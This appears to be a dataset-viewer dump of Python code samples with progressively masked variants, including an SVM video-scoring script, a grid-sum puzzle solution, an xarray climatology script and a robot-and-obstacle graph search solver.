code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(n):
if cl[i] == a + b:
print(i + 1)
<|reserved_special_token_1|>
n, a, b = map(int, input().split())
cl = list(map(int, input().split()))
for i in range(n):
if cl[i] == a + b:
print(i + 1)
|
flexible
|
{
"blob_id": "ff081a5ff46ab37dc5a144fb4616c06ef3bca490",
"index": 7286,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(n):\n if cl[i] == a + b:\n print(i + 1)\n",
"step-3": "n, a, b = map(int, input().split())\ncl = list(map(int, input().split()))\nfor i in range(n):\n if cl[i] == a + b:\n print(i + 1)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/bin/python
import numpy as np
import os
from sklearn.svm.classes import SVC
import pickle
import sys
# Apply the SVM model to the testing videos; Output the score for each video
if __name__ == '__main__':
if len(sys.argv) != 5:
print("Usage: {0} model_file feat_dir feat_dim output_file".format(sys.argv[0]))
print("model_file -- path of the trained svm file")
print("feat_dir -- dir of feature files")
print("file_list_path -- path of list file (val.lst or test.lst)")
print("output_file -- path to save the prediction score")
exit(1)
model_file = sys.argv[1]
feat_dir = sys.argv[2]
file_list_path = sys.argv[3]
output_file = sys.argv[4]
file_list = []
with open(file_list_path) as f:
for line in f.readlines():
L = line.replace('\n', ' ').split()
file_list.append(L[0])
smodel = pickle.load(open(model_file,"rb"))
possible_results = ['NULL', 'P001','P002','P003']
pred = []
conf = []
print('SVM_MODEL: {}'.format(model_file))
for file in file_list:
bow_file = feat_dir + 'bow' + file + '.pkl'
if os.path.isfile(bow_file):
with open(bow_file,'rb') as f:
data = pickle.load(f)
pred.extend(smodel.predict([data]))
conf.extend(smodel.decision_function([data]))
else:
pred.extend(['NULL'])
conf.extend([[1, 0, 0, 0]])
print('NUM PREDICTION TO TEST: {}'.format(len(pred)))
with open(output_file,'w') as f:
for i in range(0, len(file_list)):
video = file_list[i]
f.write(str(video) + ' ' + pred[i] + '\n')
for i in range(1,4):
# tmp = np.asarray(pred)
# template = np.zeros(np.size(tmp))
# with open(possible_results[i] +'_val','w') as f:
# ind = np.where(tmp == possible_results[i])
# for j in range(0, len(ind)):
# template[ind[j]] = 1
# for j in range(0, len(template)):
# f.write(str(int(template[j])) +'\n')
print(output_file[0:-4]+'_'+possible_results[i] +'_val_label')
with open(output_file[0:-4]+'_'+possible_results[i] +'_val_label','w') as f:
for j in range(0, len(pred)):
video = file_list[j]
if j< len(pred)-1:
f.write(str(conf[j][i])+' # confidence for video ' + video + '\n')
else:
f.write(str(conf[j][i])+' # confidence for video ' + video + '\n')
|
normal
|
{
"blob_id": "385dccfab4d7c37d10d968658b51e231691a7b49",
"index": 1556,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n if len(sys.argv) != 5:\n print('Usage: {0} model_file feat_dir feat_dim output_file'.format(\n sys.argv[0]))\n print('model_file -- path of the trained svm file')\n print('feat_dir -- dir of feature files')\n print('file_list_path -- path of list file (val.lst or test.lst)')\n print('output_file -- path to save the prediction score')\n exit(1)\n model_file = sys.argv[1]\n feat_dir = sys.argv[2]\n file_list_path = sys.argv[3]\n output_file = sys.argv[4]\n file_list = []\n with open(file_list_path) as f:\n for line in f.readlines():\n L = line.replace('\\n', ' ').split()\n file_list.append(L[0])\n smodel = pickle.load(open(model_file, 'rb'))\n possible_results = ['NULL', 'P001', 'P002', 'P003']\n pred = []\n conf = []\n print('SVM_MODEL: {}'.format(model_file))\n for file in file_list:\n bow_file = feat_dir + 'bow' + file + '.pkl'\n if os.path.isfile(bow_file):\n with open(bow_file, 'rb') as f:\n data = pickle.load(f)\n pred.extend(smodel.predict([data]))\n conf.extend(smodel.decision_function([data]))\n else:\n pred.extend(['NULL'])\n conf.extend([[1, 0, 0, 0]])\n print('NUM PREDICTION TO TEST: {}'.format(len(pred)))\n with open(output_file, 'w') as f:\n for i in range(0, len(file_list)):\n video = file_list[i]\n f.write(str(video) + ' ' + pred[i] + '\\n')\n for i in range(1, 4):\n print(output_file[0:-4] + '_' + possible_results[i] + '_val_label')\n with open(output_file[0:-4] + '_' + possible_results[i] +\n '_val_label', 'w') as f:\n for j in range(0, len(pred)):\n video = file_list[j]\n if j < len(pred) - 1:\n f.write(str(conf[j][i]) + ' # confidence for video ' +\n video + '\\n')\n else:\n f.write(str(conf[j][i]) + ' # confidence for video ' +\n video + '\\n')\n",
"step-3": "import numpy as np\nimport os\nfrom sklearn.svm.classes import SVC\nimport pickle\nimport sys\nif __name__ == '__main__':\n if len(sys.argv) != 5:\n print('Usage: {0} model_file feat_dir feat_dim output_file'.format(\n sys.argv[0]))\n print('model_file -- path of the trained svm file')\n print('feat_dir -- dir of feature files')\n print('file_list_path -- path of list file (val.lst or test.lst)')\n print('output_file -- path to save the prediction score')\n exit(1)\n model_file = sys.argv[1]\n feat_dir = sys.argv[2]\n file_list_path = sys.argv[3]\n output_file = sys.argv[4]\n file_list = []\n with open(file_list_path) as f:\n for line in f.readlines():\n L = line.replace('\\n', ' ').split()\n file_list.append(L[0])\n smodel = pickle.load(open(model_file, 'rb'))\n possible_results = ['NULL', 'P001', 'P002', 'P003']\n pred = []\n conf = []\n print('SVM_MODEL: {}'.format(model_file))\n for file in file_list:\n bow_file = feat_dir + 'bow' + file + '.pkl'\n if os.path.isfile(bow_file):\n with open(bow_file, 'rb') as f:\n data = pickle.load(f)\n pred.extend(smodel.predict([data]))\n conf.extend(smodel.decision_function([data]))\n else:\n pred.extend(['NULL'])\n conf.extend([[1, 0, 0, 0]])\n print('NUM PREDICTION TO TEST: {}'.format(len(pred)))\n with open(output_file, 'w') as f:\n for i in range(0, len(file_list)):\n video = file_list[i]\n f.write(str(video) + ' ' + pred[i] + '\\n')\n for i in range(1, 4):\n print(output_file[0:-4] + '_' + possible_results[i] + '_val_label')\n with open(output_file[0:-4] + '_' + possible_results[i] +\n '_val_label', 'w') as f:\n for j in range(0, len(pred)):\n video = file_list[j]\n if j < len(pred) - 1:\n f.write(str(conf[j][i]) + ' # confidence for video ' +\n video + '\\n')\n else:\n f.write(str(conf[j][i]) + ' # confidence for video ' +\n video + '\\n')\n",
"step-4": "#!/bin/python \n\nimport numpy as np\nimport os\nfrom sklearn.svm.classes import SVC\nimport pickle\nimport sys\n\n# Apply the SVM model to the testing videos; Output the score for each video\n\nif __name__ == '__main__':\n if len(sys.argv) != 5:\n print(\"Usage: {0} model_file feat_dir feat_dim output_file\".format(sys.argv[0]))\n print(\"model_file -- path of the trained svm file\")\n print(\"feat_dir -- dir of feature files\")\n print(\"file_list_path -- path of list file (val.lst or test.lst)\")\n print(\"output_file -- path to save the prediction score\")\n exit(1)\n\n model_file = sys.argv[1]\n feat_dir = sys.argv[2]\n file_list_path = sys.argv[3]\n output_file = sys.argv[4]\n \n file_list = []\n with open(file_list_path) as f:\n for line in f.readlines():\n L = line.replace('\\n', ' ').split()\n file_list.append(L[0])\n \n smodel = pickle.load(open(model_file,\"rb\"))\n possible_results = ['NULL', 'P001','P002','P003'] \n \n pred = []\n conf = []\n print('SVM_MODEL: {}'.format(model_file))\n for file in file_list:\n bow_file = feat_dir + 'bow' + file + '.pkl'\n if os.path.isfile(bow_file):\n with open(bow_file,'rb') as f:\n data = pickle.load(f)\n pred.extend(smodel.predict([data]))\n conf.extend(smodel.decision_function([data]))\n else:\n pred.extend(['NULL'])\n conf.extend([[1, 0, 0, 0]])\n \n print('NUM PREDICTION TO TEST: {}'.format(len(pred)))\n\n \n with open(output_file,'w') as f:\n for i in range(0, len(file_list)):\n video = file_list[i]\n f.write(str(video) + ' ' + pred[i] + '\\n')\n \n for i in range(1,4):\n# tmp = np.asarray(pred)\n# template = np.zeros(np.size(tmp))\n# with open(possible_results[i] +'_val','w') as f:\n# ind = np.where(tmp == possible_results[i])\n# for j in range(0, len(ind)):\n# template[ind[j]] = 1\n# for j in range(0, len(template)):\n# f.write(str(int(template[j])) +'\\n')\n \n print(output_file[0:-4]+'_'+possible_results[i] +'_val_label')\n with open(output_file[0:-4]+'_'+possible_results[i] +'_val_label','w') as f:\n for j in range(0, len(pred)):\n video = file_list[j]\n if j< len(pred)-1:\n f.write(str(conf[j][i])+' # confidence for video ' + video + '\\n')\n else:\n f.write(str(conf[j][i])+' # confidence for video ' + video + '\\n')\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# import sys
# sys.stdin = open("농작물input.txt")
T = int(input())
for n in range(1, T+1):
N = int(input())
arr = [list(map(int, list(input()))) for _ in range(N)]
# print(arr)
a = N//2
b = N//2
result = 0
for i in range(N):
for j in range(a, b+1):
result += arr[i][j]
print(result)
if i < N//2:
a += -1
b += 1
else:
a += 1
b += -1
print("#{0} {1}".format(n, result))
|
normal
|
{
"blob_id": "2236591b3a30f51442beb20c6c43cc9e6cd921d2",
"index": 7530,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor n in range(1, T + 1):\n N = int(input())\n arr = [list(map(int, list(input()))) for _ in range(N)]\n a = N // 2\n b = N // 2\n result = 0\n for i in range(N):\n for j in range(a, b + 1):\n result += arr[i][j]\n print(result)\n if i < N // 2:\n a += -1\n b += 1\n else:\n a += 1\n b += -1\n print('#{0} {1}'.format(n, result))\n",
"step-3": "T = int(input())\nfor n in range(1, T + 1):\n N = int(input())\n arr = [list(map(int, list(input()))) for _ in range(N)]\n a = N // 2\n b = N // 2\n result = 0\n for i in range(N):\n for j in range(a, b + 1):\n result += arr[i][j]\n print(result)\n if i < N // 2:\n a += -1\n b += 1\n else:\n a += 1\n b += -1\n print('#{0} {1}'.format(n, result))\n",
"step-4": "# import sys\n# sys.stdin = open(\"농작물input.txt\")\n\nT = int(input())\n\nfor n in range(1, T+1):\n N = int(input())\n arr = [list(map(int, list(input()))) for _ in range(N)]\n # print(arr)\n a = N//2\n b = N//2\n result = 0\n for i in range(N):\n for j in range(a, b+1):\n result += arr[i][j]\n print(result)\n if i < N//2:\n a += -1\n b += 1\n else:\n a += 1\n b += -1\n\n print(\"#{0} {1}\".format(n, result))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def precip_stats_to_climatology(fili, start_year=1981, end_year=2015):
"""
Calculates average climatology for annual data - either Jan to Dec or accummulation period
"""
nyear = end_year - start_year + 1
ds = xr.open_dataset(fili)
year = ds['time'].dt.year
dsClm = ds.isel(time=(year >= start_year) & (year <= end_year)).mean(dim
='time', skipna=False)
print(dsClm)
filo = fili.replace('annual', 'annual.clm')
print(f'Writing climatology to {filo}')
dsClm.to_netcdf(filo)
return
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def precip_stats_to_climatology(fili, start_year=1981, end_year=2015):
"""
Calculates average climatology for annual data - either Jan to Dec or accummulation period
"""
nyear = end_year - start_year + 1
ds = xr.open_dataset(fili)
year = ds['time'].dt.year
dsClm = ds.isel(time=(year >= start_year) & (year <= end_year)).mean(dim
='time', skipna=False)
print(dsClm)
filo = fili.replace('annual', 'annual.clm')
print(f'Writing climatology to {filo}')
dsClm.to_netcdf(filo)
return
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description=
'Calculates climatology from annual data')
parser.add_argument('fili', type=str, help='path to annual file')
parser.add_argument('--start_year', '-sy', default=1981, help=
'First year for climatology')
parser.add_argument('--end_year', '-ey', default=2015, help=
'Last year for climatology')
args = parser.parse_args()
precip_stats_to_climatology(args.fili, start_year=args.start_year,
end_year=args.end_year)
<|reserved_special_token_1|>
import xarray as xr
def precip_stats_to_climatology(fili, start_year=1981, end_year=2015):
"""
Calculates average climatology for annual data - either Jan to Dec or accummulation period
"""
nyear = end_year - start_year + 1
ds = xr.open_dataset(fili)
year = ds['time'].dt.year
dsClm = ds.isel(time=(year >= start_year) & (year <= end_year)).mean(dim
='time', skipna=False)
print(dsClm)
filo = fili.replace('annual', 'annual.clm')
print(f'Writing climatology to {filo}')
dsClm.to_netcdf(filo)
return
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description=
'Calculates climatology from annual data')
parser.add_argument('fili', type=str, help='path to annual file')
parser.add_argument('--start_year', '-sy', default=1981, help=
'First year for climatology')
parser.add_argument('--end_year', '-ey', default=2015, help=
'Last year for climatology')
args = parser.parse_args()
precip_stats_to_climatology(args.fili, start_year=args.start_year,
end_year=args.end_year)
<|reserved_special_token_1|>
import xarray as xr
def precip_stats_to_climatology(fili, start_year=1981, end_year=2015):
"""
Calculates average climatology for annual data - either Jan to Dec or accummulation period
"""
nyear = end_year - start_year + 1
ds = xr.open_dataset(fili)
year = ds['time'].dt.year
#dsMsk = ds.isel( time=( (year >= start_year) & (year <= end_year) ) ).count(dim='time')
dsClm = ds.isel( time=( (year >= start_year) & (year <= end_year) ) ).mean(dim='time', skipna=False)
#dsClm = dsClm.where(dsMsk == nyear)
#dsMsk.to_netcdf('era5.count.nc4')
print (dsClm)
filo = fili.replace('annual','annual.clm')
print (f'Writing climatology to {filo}')
dsClm.to_netcdf(filo)
return
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser( description='Calculates climatology from annual data' )
parser.add_argument('fili', type=str, help='path to annual file')
parser.add_argument('--start_year', '-sy', default=1981,
help='First year for climatology')
parser.add_argument('--end_year', '-ey', default=2015,
help='Last year for climatology')
args = parser.parse_args()
precip_stats_to_climatology(args.fili, start_year=args.start_year, end_year=args.end_year)
|
flexible
|
{
"blob_id": "eb403fbb307332c18ffdcdf52589c714f0719960",
"index": 3052,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef precip_stats_to_climatology(fili, start_year=1981, end_year=2015):\n \"\"\"\n Calculates average climatology for annual data - either Jan to Dec or accummulation period\n \"\"\"\n nyear = end_year - start_year + 1\n ds = xr.open_dataset(fili)\n year = ds['time'].dt.year\n dsClm = ds.isel(time=(year >= start_year) & (year <= end_year)).mean(dim\n ='time', skipna=False)\n print(dsClm)\n filo = fili.replace('annual', 'annual.clm')\n print(f'Writing climatology to {filo}')\n dsClm.to_netcdf(filo)\n return\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef precip_stats_to_climatology(fili, start_year=1981, end_year=2015):\n \"\"\"\n Calculates average climatology for annual data - either Jan to Dec or accummulation period\n \"\"\"\n nyear = end_year - start_year + 1\n ds = xr.open_dataset(fili)\n year = ds['time'].dt.year\n dsClm = ds.isel(time=(year >= start_year) & (year <= end_year)).mean(dim\n ='time', skipna=False)\n print(dsClm)\n filo = fili.replace('annual', 'annual.clm')\n print(f'Writing climatology to {filo}')\n dsClm.to_netcdf(filo)\n return\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description=\n 'Calculates climatology from annual data')\n parser.add_argument('fili', type=str, help='path to annual file')\n parser.add_argument('--start_year', '-sy', default=1981, help=\n 'First year for climatology')\n parser.add_argument('--end_year', '-ey', default=2015, help=\n 'Last year for climatology')\n args = parser.parse_args()\n precip_stats_to_climatology(args.fili, start_year=args.start_year,\n end_year=args.end_year)\n",
"step-4": "import xarray as xr\n\n\ndef precip_stats_to_climatology(fili, start_year=1981, end_year=2015):\n \"\"\"\n Calculates average climatology for annual data - either Jan to Dec or accummulation period\n \"\"\"\n nyear = end_year - start_year + 1\n ds = xr.open_dataset(fili)\n year = ds['time'].dt.year\n dsClm = ds.isel(time=(year >= start_year) & (year <= end_year)).mean(dim\n ='time', skipna=False)\n print(dsClm)\n filo = fili.replace('annual', 'annual.clm')\n print(f'Writing climatology to {filo}')\n dsClm.to_netcdf(filo)\n return\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description=\n 'Calculates climatology from annual data')\n parser.add_argument('fili', type=str, help='path to annual file')\n parser.add_argument('--start_year', '-sy', default=1981, help=\n 'First year for climatology')\n parser.add_argument('--end_year', '-ey', default=2015, help=\n 'Last year for climatology')\n args = parser.parse_args()\n precip_stats_to_climatology(args.fili, start_year=args.start_year,\n end_year=args.end_year)\n",
"step-5": "import xarray as xr\n\ndef precip_stats_to_climatology(fili, start_year=1981, end_year=2015):\n \"\"\"\n Calculates average climatology for annual data - either Jan to Dec or accummulation period\n \"\"\"\n\n nyear = end_year - start_year + 1\n \n ds = xr.open_dataset(fili)\n\n year = ds['time'].dt.year\n #dsMsk = ds.isel( time=( (year >= start_year) & (year <= end_year) ) ).count(dim='time')\n dsClm = ds.isel( time=( (year >= start_year) & (year <= end_year) ) ).mean(dim='time', skipna=False)\n #dsClm = dsClm.where(dsMsk == nyear)\n \n #dsMsk.to_netcdf('era5.count.nc4')\n\n print (dsClm)\n \n filo = fili.replace('annual','annual.clm')\n print (f'Writing climatology to {filo}') \n dsClm.to_netcdf(filo)\n\n return\n\nif __name__ == \"__main__\":\n\n import argparse\n\n parser = argparse.ArgumentParser( description='Calculates climatology from annual data' )\n parser.add_argument('fili', type=str, help='path to annual file')\n parser.add_argument('--start_year', '-sy', default=1981,\n help='First year for climatology')\n parser.add_argument('--end_year', '-ey', default=2015,\n help='Last year for climatology')\n args = parser.parse_args()\n\n precip_stats_to_climatology(args.fili, start_year=args.start_year, end_year=args.end_year)\n \n\n \n \n \n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def make_moves_from_path(path):
moves = []
p = path[:]
for i in range(len(p) - 1):
moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))
return moves
def find_nearest_hole(o, r, graph, start):
visited, queue = [], [(start, [start])]
results = []
while queue:
node, search_path = queue.pop(0)
if node not in visited:
visited.append(node)
adjacent = graph.adj[node]
for neighbor in adjacent:
if neighbor in o:
if neighbor not in visited:
queue.append((neighbor, search_path + [neighbor]))
elif neighbor != r:
results.append(search_path + [neighbor])
moves = []
for res in results:
moves.append((res[0], res[-1], len(res) - 1, res))
return moves
def move_robot(o, r, graph, node_from, node_to):
obstacles = o[:]
robot = r
if not node_from == r:
raise RuntimeError('node_from is not robot ' + node_from)
if node_to in obstacles:
raise RuntimeError('node_to is obstacle ' + node_to)
robot = node_to
return obstacles, robot
<|reserved_special_token_0|>
def possible_robot_moves(o, r, graph):
moves = []
robot_node = r
robot_neighbors = graph.adj[r]
for neighbor in robot_neighbors:
if is_hole(o, r, neighbor):
moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))
return moves
def possible_obstacle_moves(o, r, graph, obstacle):
obstacle_neighbors = graph.adj[obstacle]
moves = []
for neighbor in obstacle_neighbors:
if is_hole(o, r, neighbor) and neighbor != r:
moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))
elif neighbor != r:
nh = find_nearest_hole(o, r, graph, neighbor)
if len(nh) > 0:
moves.extend(find_nearest_hole(o, r, graph, neighbor))
return moves
<|reserved_special_token_0|>
def possible_moves(o, r, graph):
moves = []
moves.extend(possible_robot_moves(o, r, graph))
moves.extend(possible_obstacles_moves(o, r, graph))
return moves
<|reserved_special_token_0|>
def solve_heap(o, r, graph, t):
round = 0
visited = set([])
queue = [(-1000, [], o, r)]
while queue:
score, moves, obstacles, robot = heap.heappop(queue)
obstacles.sort()
st = '#'.join(obstacles), robot
if st not in visited:
visited.add(st)
score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))
pm = possible_moves(obstacles, robot, graph)
for move in pm:
new_moves = moves[:]
new_moves.append(move)
newobstacles, newrobot = make_moves(obstacles, robot, graph,
[move])
if t == newrobot:
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
return new_moves
round = round + 1
if round % 100000 == 0:
print('Visited = ' + str(len(visited)))
heap.heappush(queue, (score, new_moves, newobstacles, newrobot)
)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def remove_jumps(moves):
res = []
for move in moves:
if move[2] > 1:
move[3].reverse()
res.extend(make_moves_from_path(move[3]))
else:
res.append(move)
return res
def make_moves_from_path(path):
moves = []
p = path[:]
for i in range(len(p) - 1):
moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))
return moves
def find_nearest_hole(o, r, graph, start):
visited, queue = [], [(start, [start])]
results = []
while queue:
node, search_path = queue.pop(0)
if node not in visited:
visited.append(node)
adjacent = graph.adj[node]
for neighbor in adjacent:
if neighbor in o:
if neighbor not in visited:
queue.append((neighbor, search_path + [neighbor]))
elif neighbor != r:
results.append(search_path + [neighbor])
moves = []
for res in results:
moves.append((res[0], res[-1], len(res) - 1, res))
return moves
def move_robot(o, r, graph, node_from, node_to):
obstacles = o[:]
robot = r
if not node_from == r:
raise RuntimeError('node_from is not robot ' + node_from)
if node_to in obstacles:
raise RuntimeError('node_to is obstacle ' + node_to)
robot = node_to
return obstacles, robot
def move_obstacle(o, r, graph, node_from, node_to):
obstacles = o[:]
robot = r
if node_from not in obstacles:
raise RuntimeError('node_from is not obstacle ' + node_from)
if node_to in obstacles:
raise RuntimeError('node_to is obstacle ' + node_to)
if node_to == robot:
raise RuntimeError('node_to is robot' + node_to)
obstacles.append(node_to)
obstacles.remove(node_from)
return obstacles, robot
<|reserved_special_token_0|>
def possible_robot_moves(o, r, graph):
moves = []
robot_node = r
robot_neighbors = graph.adj[r]
for neighbor in robot_neighbors:
if is_hole(o, r, neighbor):
moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))
return moves
def possible_obstacle_moves(o, r, graph, obstacle):
obstacle_neighbors = graph.adj[obstacle]
moves = []
for neighbor in obstacle_neighbors:
if is_hole(o, r, neighbor) and neighbor != r:
moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))
elif neighbor != r:
nh = find_nearest_hole(o, r, graph, neighbor)
if len(nh) > 0:
moves.extend(find_nearest_hole(o, r, graph, neighbor))
return moves
<|reserved_special_token_0|>
def possible_moves(o, r, graph):
moves = []
moves.extend(possible_robot_moves(o, r, graph))
moves.extend(possible_obstacles_moves(o, r, graph))
return moves
def color(o, r, graph, node, target, start):
if node in o and node == target:
return 'c'
if node in o:
return 'r'
if node == r:
return 'b'
if node == start:
return 'y'
if node == target:
return 'g'
return 'w'
<|reserved_special_token_0|>
def solve_heap(o, r, graph, t):
round = 0
visited = set([])
queue = [(-1000, [], o, r)]
while queue:
score, moves, obstacles, robot = heap.heappop(queue)
obstacles.sort()
st = '#'.join(obstacles), robot
if st not in visited:
visited.add(st)
score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))
pm = possible_moves(obstacles, robot, graph)
for move in pm:
new_moves = moves[:]
new_moves.append(move)
newobstacles, newrobot = make_moves(obstacles, robot, graph,
[move])
if t == newrobot:
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
return new_moves
round = round + 1
if round % 100000 == 0:
print('Visited = ' + str(len(visited)))
heap.heappush(queue, (score, new_moves, newobstacles, newrobot)
)
def solve_brute_force(o, r, graph, t):
num_of_solutions = 0
all_solutions = []
round = 0
visited = set([])
queue = [([], o, r)]
while queue:
moves, obstacles, robot = queue.pop(0)
obstacles.sort()
st = '#'.join(obstacles), robot
if st not in visited:
visited.add(st)
pm = possible_moves(obstacles, robot, graph)
for move in pm:
new_moves = moves[:]
new_moves.append(move)
newobstacles, newrobot = make_moves(obstacles, robot, graph,
[move])
if t == newrobot:
all_solutions.append(new_moves)
round = round + 1
if round % 100000 == 0:
print('Visited = ' + str(len(visited)))
queue.append((new_moves, newobstacles, newrobot))
print('Number of solutions: ' + str(len(all_solutions)))
best = min(all_solutions, key=lambda x: len(x))
return best
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def remove_jumps(moves):
res = []
for move in moves:
if move[2] > 1:
move[3].reverse()
res.extend(make_moves_from_path(move[3]))
else:
res.append(move)
return res
def make_moves_from_path(path):
moves = []
p = path[:]
for i in range(len(p) - 1):
moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))
return moves
def find_nearest_hole(o, r, graph, start):
visited, queue = [], [(start, [start])]
results = []
while queue:
node, search_path = queue.pop(0)
if node not in visited:
visited.append(node)
adjacent = graph.adj[node]
for neighbor in adjacent:
if neighbor in o:
if neighbor not in visited:
queue.append((neighbor, search_path + [neighbor]))
elif neighbor != r:
results.append(search_path + [neighbor])
moves = []
for res in results:
moves.append((res[0], res[-1], len(res) - 1, res))
return moves
def move_robot(o, r, graph, node_from, node_to):
obstacles = o[:]
robot = r
if not node_from == r:
raise RuntimeError('node_from is not robot ' + node_from)
if node_to in obstacles:
raise RuntimeError('node_to is obstacle ' + node_to)
robot = node_to
return obstacles, robot
def move_obstacle(o, r, graph, node_from, node_to):
obstacles = o[:]
robot = r
if node_from not in obstacles:
raise RuntimeError('node_from is not obstacle ' + node_from)
if node_to in obstacles:
raise RuntimeError('node_to is obstacle ' + node_to)
if node_to == robot:
raise RuntimeError('node_to is robot' + node_to)
obstacles.append(node_to)
obstacles.remove(node_from)
return obstacles, robot
<|reserved_special_token_0|>
def possible_robot_moves(o, r, graph):
moves = []
robot_node = r
robot_neighbors = graph.adj[r]
for neighbor in robot_neighbors:
if is_hole(o, r, neighbor):
moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))
return moves
def possible_obstacle_moves(o, r, graph, obstacle):
obstacle_neighbors = graph.adj[obstacle]
moves = []
for neighbor in obstacle_neighbors:
if is_hole(o, r, neighbor) and neighbor != r:
moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))
elif neighbor != r:
nh = find_nearest_hole(o, r, graph, neighbor)
if len(nh) > 0:
moves.extend(find_nearest_hole(o, r, graph, neighbor))
return moves
<|reserved_special_token_0|>
def possible_moves(o, r, graph):
moves = []
moves.extend(possible_robot_moves(o, r, graph))
moves.extend(possible_obstacles_moves(o, r, graph))
return moves
def color(o, r, graph, node, target, start):
if node in o and node == target:
return 'c'
if node in o:
return 'r'
if node == r:
return 'b'
if node == start:
return 'y'
if node == target:
return 'g'
return 'w'
<|reserved_special_token_0|>
def fitness_fun_heap(graph, obstacles, robot, target, num_of_moves):
shortest = nx.shortest_path(graph, robot, target)
score = -len(shortest) - num_of_moves
for obstacle in obstacles:
if obstacle in shortest:
score = score - 1
return -score
def solve_heap(o, r, graph, t):
round = 0
visited = set([])
queue = [(-1000, [], o, r)]
while queue:
score, moves, obstacles, robot = heap.heappop(queue)
obstacles.sort()
st = '#'.join(obstacles), robot
if st not in visited:
visited.add(st)
score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))
pm = possible_moves(obstacles, robot, graph)
for move in pm:
new_moves = moves[:]
new_moves.append(move)
newobstacles, newrobot = make_moves(obstacles, robot, graph,
[move])
if t == newrobot:
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
return new_moves
round = round + 1
if round % 100000 == 0:
print('Visited = ' + str(len(visited)))
heap.heappush(queue, (score, new_moves, newobstacles, newrobot)
)
def solve_brute_force(o, r, graph, t):
num_of_solutions = 0
all_solutions = []
round = 0
visited = set([])
queue = [([], o, r)]
while queue:
moves, obstacles, robot = queue.pop(0)
obstacles.sort()
st = '#'.join(obstacles), robot
if st not in visited:
visited.add(st)
pm = possible_moves(obstacles, robot, graph)
for move in pm:
new_moves = moves[:]
new_moves.append(move)
newobstacles, newrobot = make_moves(obstacles, robot, graph,
[move])
if t == newrobot:
all_solutions.append(new_moves)
round = round + 1
if round % 100000 == 0:
print('Visited = ' + str(len(visited)))
queue.append((new_moves, newobstacles, newrobot))
print('Number of solutions: ' + str(len(all_solutions)))
best = min(all_solutions, key=lambda x: len(x))
return best
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def remove_jumps(moves):
res = []
for move in moves:
if move[2] > 1:
move[3].reverse()
res.extend(make_moves_from_path(move[3]))
else:
res.append(move)
return res
def make_moves_from_path(path):
moves = []
p = path[:]
for i in range(len(p) - 1):
moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))
return moves
def find_nearest_hole(o, r, graph, start):
visited, queue = [], [(start, [start])]
results = []
while queue:
node, search_path = queue.pop(0)
if node not in visited:
visited.append(node)
adjacent = graph.adj[node]
for neighbor in adjacent:
if neighbor in o:
if neighbor not in visited:
queue.append((neighbor, search_path + [neighbor]))
elif neighbor != r:
results.append(search_path + [neighbor])
moves = []
for res in results:
moves.append((res[0], res[-1], len(res) - 1, res))
return moves
def move_robot(o, r, graph, node_from, node_to):
obstacles = o[:]
robot = r
if not node_from == r:
raise RuntimeError('node_from is not robot ' + node_from)
if node_to in obstacles:
raise RuntimeError('node_to is obstacle ' + node_to)
robot = node_to
return obstacles, robot
def move_obstacle(o, r, graph, node_from, node_to):
obstacles = o[:]
robot = r
if node_from not in obstacles:
raise RuntimeError('node_from is not obstacle ' + node_from)
if node_to in obstacles:
raise RuntimeError('node_to is obstacle ' + node_to)
if node_to == robot:
raise RuntimeError('node_to is robot' + node_to)
obstacles.append(node_to)
obstacles.remove(node_from)
return obstacles, robot
def make_move(o, r, graph, node_from, node_to):
if node_from == None:
return o, r
if r == node_from:
return move_robot(o, r, graph, node_from, node_to)
if node_from in o:
return move_obstacle(o, r, graph, node_from, node_to)
raise RuntimeError('Cant move from ' + node_from)
<|reserved_special_token_0|>
def is_hole(o, r, node):
if node not in o:
return True
return False
def possible_robot_moves(o, r, graph):
moves = []
robot_node = r
robot_neighbors = graph.adj[r]
for neighbor in robot_neighbors:
if is_hole(o, r, neighbor):
moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))
return moves
def possible_obstacle_moves(o, r, graph, obstacle):
obstacle_neighbors = graph.adj[obstacle]
moves = []
for neighbor in obstacle_neighbors:
if is_hole(o, r, neighbor) and neighbor != r:
